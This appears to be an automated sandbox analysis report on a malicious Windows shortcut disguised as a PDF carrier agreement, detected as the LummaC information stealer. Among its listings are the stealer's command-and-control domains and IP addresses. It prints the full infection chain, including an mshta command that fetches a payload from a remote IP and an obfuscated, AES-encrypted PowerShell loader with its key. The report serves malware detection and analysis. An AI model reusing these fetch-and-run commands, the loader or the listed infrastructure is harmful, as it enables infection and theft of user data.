Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D0B69 mov eax, dword ptr fs:[00000030h] 15_2_006D0B69
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D11B9 mov eax, dword ptr fs:[00000030h] 15_2_006D11B9
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D11B8 mov eax, dword ptr fs:[00000030h] 15_2_006D11B8
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 15_2_006D0F19 mov eax, dword ptr fs:[00000030h] 15_2_006D0F19
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
LummaC encrypted strings found
Source: SmartyUninstaller4.exe String found in binary or memory: proffyrobharborye.xyz
Source: SmartyUninstaller4.exe String found in binary or memory: panameradovkews.xyz
Source: SmartyUninstaller4.exe String found in binary or memory: aplointexhausdh.xyz
Source: SmartyUninstaller4.exe String found in binary or memory: manufactiredowreachhd.xyzu
Source: SmartyUninstaller4.exe String found in binary or memory: slammyslideplanntywks.xyzu
Source: SmartyUninstaller4.exe String found in binary or memory: depositybounceddwk.xyz
Source: SmartyUninstaller4.exe String found in binary or memory: exertcreatedadnndjw.xyz
Source: SmartyUninstaller4.exe String found in binary or memory: compilecoppydkewsw.xyz
Source: SmartyUninstaller4.exe String found in binary or memory: radiationcommentwks.xyz
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://92.118.112.135/carrieragreement Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function aaTynIUh($PiQE){return -split ($PiQE -replace '..', '0x$& ')};$VuCCamL = aaTynIUh('E5A55824D9EAF8A8C3514E39CEDEF30B918A2A1589DF287752B8D027F1DFBF83EE12DB088588624EC45E743D432DCA79C93A71346B475008579989A09F5D98E1D33138882FF475A777BFA374EB0BFD6A0B25AA253A05AF641E20F4C77FC5CD0BE786B5EAA1F37060C9B9C4DA610ABA833E1A608F90B5E6B8D0C72A052CE081AB6CEF4890ABA76C1939DBFDD7FC25ACC315BBF81EE00ED5787C37F8EC15BBBDC9534009AE0B1FAA407C742099126C7FD0D4FE48ED239BE661785C96903D2AED48751F6A32EA8FFA5B259E531FDE2EBF959342027F3F21889F4103EF93280E2115E8BCEF81D14F8F1D89FF8A475B2F2B6767EDC2491A188CC66BF8A2D116BBD2EDADACC2568D9E03C1330B480BB24242F43AF308990B03DE2465DE44C087B8FDB79C2730BDA7EF8701F2098485DEDB88534CEB321A754FAF5DFF2DFCE6F9109288BE3A78B858A0BAED175DE2205F8F17399B26D860EF1D36E319889DDF54024D57413E8ED3BEE8124C99DC0646E86AF2E54A5DEBC68B17BE7F7790E239CC2289250802915B60ED57ECB3427EAA9BE75B0D811C4C5B5A1BC67E8A4E562AF8BB426F451AD03756F2DA6C85FD25754E21264E99ADB5CBE785D577DF55A5CFC65B2968F737477CC6D303C6B6AE4ADD6B71C05EF67DE56A89B1959E503669C7B27D1EB3EB0609B8D7F9D259D985807288297EFEF04CF7B98A19BBE5FEBF808E5D0B15E790F44431D0F52E70C27ECA747B9168AACC8B7730C50B98B31A5E95CF43E58AB8DA6BF46550035D830DBF8CE8A450849D09E261020820A3C898AC6BC7CA589994D1A7BC6CBB01495D1CA57D60B1E68AF9D1E53C5BD5310153FC3E2B8DFD9D910AA312BC6C305AA7DE3E6C1D1689D0E1B54ECBA688DB6977B50F8ADB1C843896B619A4C1C88BC05BA171BAF12FB0751D9425C26258CBB29B82CA964FDCFBB779D338C140E4B54AD473109871DA665A1028B5489F2936C002C23995EAAD75FAEC7D1C23658D72E5BCA801DBF50A83D1585FB03487AACBE213CBFBAF54DDF43E0CC1780607030370FD254E6D185EC019BED40DF3A26364E22144A3A2AB186D06DF0AF4FE35CA93D05915D6D6D7D3C7A54F25E18421320862CE1CC9B0C7B510C13A30A01950668FE380F154C133E73AB0E0C92A044F3669BE276DD745D220149675000E09D63EE960879409BFEDEDA3483BC1079257FCEC92518331731EBF09B0068461A60C6FE5450A668155187769B3714F8674259AE2383B26BFC047B3345B4B1A2E81BC4ACC879B282641BEA83118BD16A91C3FB040349F9A220F52F0A904E971C68A8B7AE7F5860034B22033F31CAF74B121D6F0672EDF133C9764CF0B79274ADA57554D5617BDEB924FDD1A69B7BCA18D34E108B89C42EAF960A2FE309D50F3E17C6EC586E0EF4646E2D418053C151C42EA1E041F414D94AAEC7DCA3D6086FEFF2D608A4D5DEA1B781AEA3109FCF4EF60DBA03DCB649FE16896B50AED1F8D5319155B11B14787101FA727118B88D50589B74206D84CD45A5FFF0653B0DC3265B92186DA8EAE07E65D0B6F1F9562421931175ADCDB8346280E92044D6DF6C3D7D6C52C1B0961211A8CD2138E79D9387D320F595E3DFFAC8D1B0D2636413271E4DC4BF7316364061FF4C0A348C05FDFAAE265E971340F850E916C6EDEF9420625A4401A18306FFA9047A91CDEAD91F699FE8D0055E27192A17C38DCBCEA41A83C4E3158F4D0F8634F43AC1CAAE822B7E6');$VTjxj = [System.Security.Cryptography.Aes]::Create();$VTjxj.Key = aaTynIUh('7566656A62656D6D6241736C57716B6A');$VTjxj.IV = New-Object byte[] 16;$paOghKFl = $VTjxj.CreateDecryptor();$EkiGvPGrs = $paOghKFl.TransformFinalBlock($VuCCamL, 0, $VuCCamL.Length);$NvSFUKzSO = [System.Text.Encoding]::Utf Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\agreement.pdf" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe "C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function aatyniuh($piqe){return -split ($piqe -replace '..', '0x$& ')};$vuccaml = aatyniuh('e5a55824d9eaf8a8c3514e39cedef30b918a2a1589df287752b8d027f1dfbf83ee12db088588624ec45e743d432dca79c93a71346b475008579989a09f5d98e1d33138882ff475a777bfa374eb0bfd6a0b25aa253a05af641e20f4c77fc5cd0be786b5eaa1f37060c9b9c4da610aba833e1a608f90b5e6b8d0c72a052ce081ab6cef4890aba76c1939dbfdd7fc25acc315bbf81ee00ed5787c37f8ec15bbbdc9534009ae0b1faa407c742099126c7fd0d4fe48ed239be661785c96903d2aed48751f6a32ea8ffa5b259e531fde2ebf959342027f3f21889f4103ef93280e2115e8bcef81d14f8f1d89ff8a475b2f2b6767edc2491a188cc66bf8a2d116bbd2edadacc2568d9e03c1330b480bb24242f43af308990b03de2465de44c087b8fdb79c2730bda7ef8701f2098485dedb88534ceb321a754faf5dff2dfce6f9109288be3a78b858a0baed175de2205f8f17399b26d860ef1d36e319889ddf54024d57413e8ed3bee8124c99dc0646e86af2e54a5debc68b17be7f7790e239cc2289250802915b60ed57ecb3427eaa9be75b0d811c4c5b5a1bc67e8a4e562af8bb426f451ad03756f2da6c85fd25754e21264e99adb5cbe785d577df55a5cfc65b2968f737477cc6d303c6b6ae4add6b71c05ef67de56a89b1959e503669c7b27d1eb3eb0609b8d7f9d259d985807288297efef04cf7b98a19bbe5febf808e5d0b15e790f44431d0f52e70c27eca747b9168aacc8b7730c50b98b31a5e95cf43e58ab8da6bf46550035d830dbf8ce8a450849d09e261020820a3c898ac6bc7ca589994d1a7bc6cbb01495d1ca57d60b1e68af9d1e53c5bd5310153fc3e2b8dfd9d910aa312bc6c305aa7de3e6c1d1689d0e1b54ecba688db6977b50f8adb1c843896b619a4c1c88bc05ba171baf12fb0751d9425c26258cbb29b82ca964fdcfbb779d338c140e4b54ad473109871da665a1028b5489f2936c002c23995eaad75faec7d1c23658d72e5bca801dbf50a83d1585fb03487aacbe213cbfbaf54ddf43e0cc1780607030370fd254e6d185ec019bed40df3a26364e22144a3a2ab186d06df0af4fe35ca93d05915d6d6d7d3c7a54f25e18421320862ce1cc9b0c7b510c13a30a01950668fe380f154c133e73ab0e0c92a044f3669be276dd745d220149675000e09d63ee960879409bfededa3483bc1079257fcec92518331731ebf09b0068461a60c6fe5450a668155187769b3714f8674259ae2383b26bfc047b3345b4b1a2e81bc4acc879b282641bea83118bd16a91c3fb040349f9a220f52f0a904e971c68a8b7ae7f5860034b22033f31caf74b121d6f0672edf133c9764cf0b79274ada57554d5617bdeb924fdd1a69b7bca18d34e108b89c42eaf960a2fe309d50f3e17c6ec586e0ef4646e2d418053c151c42ea1e041f414d94aaec7dca3d6086feff2d608a4d5dea1b781aea3109fcf4ef60dba03dcb649fe16896b50aed1f8d5319155b11b14787101fa727118b88d50589b74206d84cd45a5fff0653b0dc3265b92186da8eae07e65d0b6f1f9562421931175adcdb8346280e92044d6df6c3d7d6c52c1b0961211a8cd2138e79d9387d320f595e3dffac8d1b0d2636413271e4dc4bf7316364061ff4c0a348c05fdfaae265e971340f850e916c6edef9420625a4401a18306ffa9047a91cdead91f699fe8d0055e27192a17c38dcbcea41a83c4e3158f4d0f8634f43ac1caae822b7e6');$vtjxj = [system.security.cryptography.aes]::create();$vtjxj.key = aatyniuh('7566656a62656d6d6241736c57716b6a');$vtjxj.iv = new-object byte[] 16;$paoghkfl = $vtjxj.createdecryptor();$ekigvpgrs = $paoghkfl.transformfinalblock($vuccaml, 0, $vuccaml.length);$nvsfukzso = [system.text.encoding]::utf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function aatyniuh($piqe){return -split ($piqe -replace '..', '0x$& ')};$vuccaml = aatyniuh('e5a55824d9eaf8a8c3514e39cedef30b918a2a1589df287752b8d027f1dfbf83ee12db088588624ec45e743d432dca79c93a71346b475008579989a09f5d98e1d33138882ff475a777bfa374eb0bfd6a0b25aa253a05af641e20f4c77fc5cd0be786b5eaa1f37060c9b9c4da610aba833e1a608f90b5e6b8d0c72a052ce081ab6cef4890aba76c1939dbfdd7fc25acc315bbf81ee00ed5787c37f8ec15bbbdc9534009ae0b1faa407c742099126c7fd0d4fe48ed239be661785c96903d2aed48751f6a32ea8ffa5b259e531fde2ebf959342027f3f21889f4103ef93280e2115e8bcef81d14f8f1d89ff8a475b2f2b6767edc2491a188cc66bf8a2d116bbd2edadacc2568d9e03c1330b480bb24242f43af308990b03de2465de44c087b8fdb79c2730bda7ef8701f2098485dedb88534ceb321a754faf5dff2dfce6f9109288be3a78b858a0baed175de2205f8f17399b26d860ef1d36e319889ddf54024d57413e8ed3bee8124c99dc0646e86af2e54a5debc68b17be7f7790e239cc2289250802915b60ed57ecb3427eaa9be75b0d811c4c5b5a1bc67e8a4e562af8bb426f451ad03756f2da6c85fd25754e21264e99adb5cbe785d577df55a5cfc65b2968f737477cc6d303c6b6ae4add6b71c05ef67de56a89b1959e503669c7b27d1eb3eb0609b8d7f9d259d985807288297efef04cf7b98a19bbe5febf808e5d0b15e790f44431d0f52e70c27eca747b9168aacc8b7730c50b98b31a5e95cf43e58ab8da6bf46550035d830dbf8ce8a450849d09e261020820a3c898ac6bc7ca589994d1a7bc6cbb01495d1ca57d60b1e68af9d1e53c5bd5310153fc3e2b8dfd9d910aa312bc6c305aa7de3e6c1d1689d0e1b54ecba688db6977b50f8adb1c843896b619a4c1c88bc05ba171baf12fb0751d9425c26258cbb29b82ca964fdcfbb779d338c140e4b54ad473109871da665a1028b5489f2936c002c23995eaad75faec7d1c23658d72e5bca801dbf50a83d1585fb03487aacbe213cbfbaf54ddf43e0cc1780607030370fd254e6d185ec019bed40df3a26364e22144a3a2ab186d06df0af4fe35ca93d05915d6d6d7d3c7a54f25e18421320862ce1cc9b0c7b510c13a30a01950668fe380f154c133e73ab0e0c92a044f3669be276dd745d220149675000e09d63ee960879409bfededa3483bc1079257fcec92518331731ebf09b0068461a60c6fe5450a668155187769b3714f8674259ae2383b26bfc047b3345b4b1a2e81bc4acc879b282641bea83118bd16a91c3fb040349f9a220f52f0a904e971c68a8b7ae7f5860034b22033f31caf74b121d6f0672edf133c9764cf0b79274ada57554d5617bdeb924fdd1a69b7bca18d34e108b89c42eaf960a2fe309d50f3e17c6ec586e0ef4646e2d418053c151c42ea1e041f414d94aaec7dca3d6086feff2d608a4d5dea1b781aea3109fcf4ef60dba03dcb649fe16896b50aed1f8d5319155b11b14787101fa727118b88d50589b74206d84cd45a5fff0653b0dc3265b92186da8eae07e65d0b6f1f9562421931175adcdb8346280e92044d6df6c3d7d6c52c1b0961211a8cd2138e79d9387d320f595e3dffac8d1b0d2636413271e4dc4bf7316364061ff4c0a348c05fdfaae265e971340f850e916c6edef9420625a4401a18306ffa9047a91cdead91f699fe8d0055e27192a17c38dcbcea41a83c4e3158f4d0f8634f43ac1caae822b7e6');$vtjxj = [system.security.cryptography.aes]::create();$vtjxj.key = aatyniuh('7566656a62656d6d6241736c57716b6a');$vtjxj.iv = new-object byte[] 16;$paoghkfl = $vtjxj.createdecryptor();$ekigvpgrs = $paoghkfl.transformfinalblock($vuccaml, 0, $vuccaml.length);$nvsfukzso = [system.text.encoding]::utf Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466034 Sample: CarrierAgreement.pdf.lnk.mal.lnk Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 46 slammyslideplanntywks.xyz 2->46 48 radiationcommentwks.xyz 2->48 50 7 other IPs or domains 2->50 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 70 12 other signatures 2->70 12 forfiles.exe 1 2->12         started        15 svchost.exe 1 1 2->15         started        signatures3 68 Performs DNS queries to domains with low reputation 48->68 process4 dnsIp5 78 Windows shortcut file (LNK) starts blacklisted processes 12->78 18 powershell.exe 7 12->18         started        21 conhost.exe 1 12->21         started        56 127.0.0.1 unknown unknown 15->56 signatures6 process7 signatures8 58 Windows shortcut file (LNK) starts blacklisted processes 18->58 60 Powershell drops PE file 18->60 23 mshta.exe 17 18->23         started        process9 dnsIp10 52 92.118.112.135, 49730, 49733, 80 GUDAEV-ASRU Russian Federation 23->52 42 C:\Users\user\AppData\...\carrieragreement[1], PE32 23->42 dropped 72 Windows shortcut file (LNK) starts blacklisted processes 23->72 74 Suspicious powershell command line found 23->74 76 Very long command line found 23->76 28 powershell.exe 17 19 23->28         started        file11 signatures12 process13 file14 44 C:\Users\user\...\SmartyUninstaller4.exe, PE32 28->44 dropped 31 Acrobat.exe 75 28->31         started        33 SmartyUninstaller4.exe 28->33         started        35 conhost.exe 28->35         started        process15 process16 37 AcroCEF.exe 106 31->37         started        process17 39 AcroCEF.exe 2 37->39         started        dnsIp18 54 96.17.64.189, 443, 49750 AKAMAI-ASUS United States 39->54
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
92.118.112.135
 unknown Russian Federation
209401 GUDAEV-ASRU true
96.17.64.189
 unknown United States
16625 AKAMAI-ASUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
panameradovkews.xyz unknown unknown
radiationcommentwks.xyz unknown unknown
proffyrobharborye.xyz unknown unknown
aplointexhausdh.xyz unknown unknown
compilecoppydkewsw.xyz unknown unknown
depositybounceddwk.xyz unknown unknown
exertcreatedadnndjw.xyz unknown unknown
slammyslideplanntywks.xyz unknown unknown
manufactiredowreachhd.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
radiationcommentwks.xyz true
  • Avira URL Cloud: safe
 unknown
http://92.118.112.135/agreement.pdf true
  • Avira URL Cloud: malware
 unknown
http://92.118.112.135/carrieragreement true
  • 2%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
depositybounceddwk.xyz true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
proffyrobharborye.xyz true
  • Avira URL Cloud: malware
 unknown
aplointexhausdh.xyz true
  • Avira URL Cloud: malware
 unknown
compilecoppydkewsw.xyz true
  • Avira URL Cloud: malware
 unknown
manufactiredowreachhd.xyzu true
  • Avira URL Cloud: safe
 unknown
slammyslideplanntywks.xyzu true
  • Avira URL Cloud: safe
 unknown
exertcreatedadnndjw.xyz true
  • Avira URL Cloud: malware
 unknown
panameradovkews.xyz true
  • Avira URL Cloud: malware
 unknown